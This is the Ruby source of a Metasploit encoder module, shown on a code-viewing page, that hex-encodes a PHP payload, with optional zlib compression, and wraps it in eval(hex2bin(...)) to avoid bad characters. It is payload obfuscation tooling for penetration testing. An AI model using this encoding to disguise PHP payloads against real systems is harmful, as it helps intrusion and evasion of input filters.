Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Encoder
7
  Rank = GreatRanking
8

9
  def initialize
10
    super(
11
      'Name' => 'PHP Hex Encoder',
12
      'Description' => %q{
13
        This encoder returns a hex string encapsulated in
14
        eval(hex2bin()), increasing the size by a bit more than
15
        a factor two.
16
      },
17
      'Author' => 'Julien Voisin',
18
      'License' => BSD_LICENSE,
19
      'Arch' => ARCH_PHP)
20
    register_options(
21
      [
22
        OptBool.new('Compress', [ true, 'Compress the payload with zlib', false ]) # Disabled by default as it relies on having php compiled with zlib, which might not be available on come exotic setups.
23
      ],
24
      self.class
25
    )
26
  end
27

28
  def encode_block(state, buf)
29
    # Have to have these for the decoder stub, so if they're not available,
30
    # there's nothing we can do here.
31
    %w[e v a l h e x 2 b i n ( ) ;].uniq.each do |c|
32
      raise BadcharError if state.badchars.include?(c)
33
    end
34

35
    if datastore['Compress']
36
      %w[g z u n c o m p r e s s].uniq.each do |c|
37
        raise BadcharError if state.badchars.include?(c)
38
      end
39
    end
40

41
    # Modern versions of PHP choke on unquoted literal strings.
42
    quote = "'"
43
    if state.badchars.include?("'")
44
      raise BadcharError.new, "The #{name} encoder failed to encode the decoder stub without bad characters." if state.badchars.include?('"')
45

46
      quote = '"'
47
    end
48

49
    if datastore['Compress']
50
      buf = Zlib::Deflate.deflate(buf)
51
    end
52

53
    hex = buf.unpack1('H*')
54

55
    state.badchars.each_byte do |byte|
56
      # Last ditch effort, if any of the normal characters used by hex
57
      # are badchars, try to replace them with something that will become
58
      # the appropriate thing on the other side.
59
      next unless hex.include?(byte.chr)
60

61
      %w[c h r ( ) .].uniq.each do |c|
62
        raise BadcharError if state.badchars.include?(c)
63
      end
64
      hex.gsub!(byte.chr, "#{quote}.chr(#{byte}).#{quote}")
65
    end
66

67
    if datastore['Compress']
68
      return 'eval(gzuncompress(hex2bin(' + quote + hex + quote + ')));'
69
    else
70
      return 'eval(hex2bin(' + quote + hex + quote + '));'
71
    end
72
  end
73
end
74

75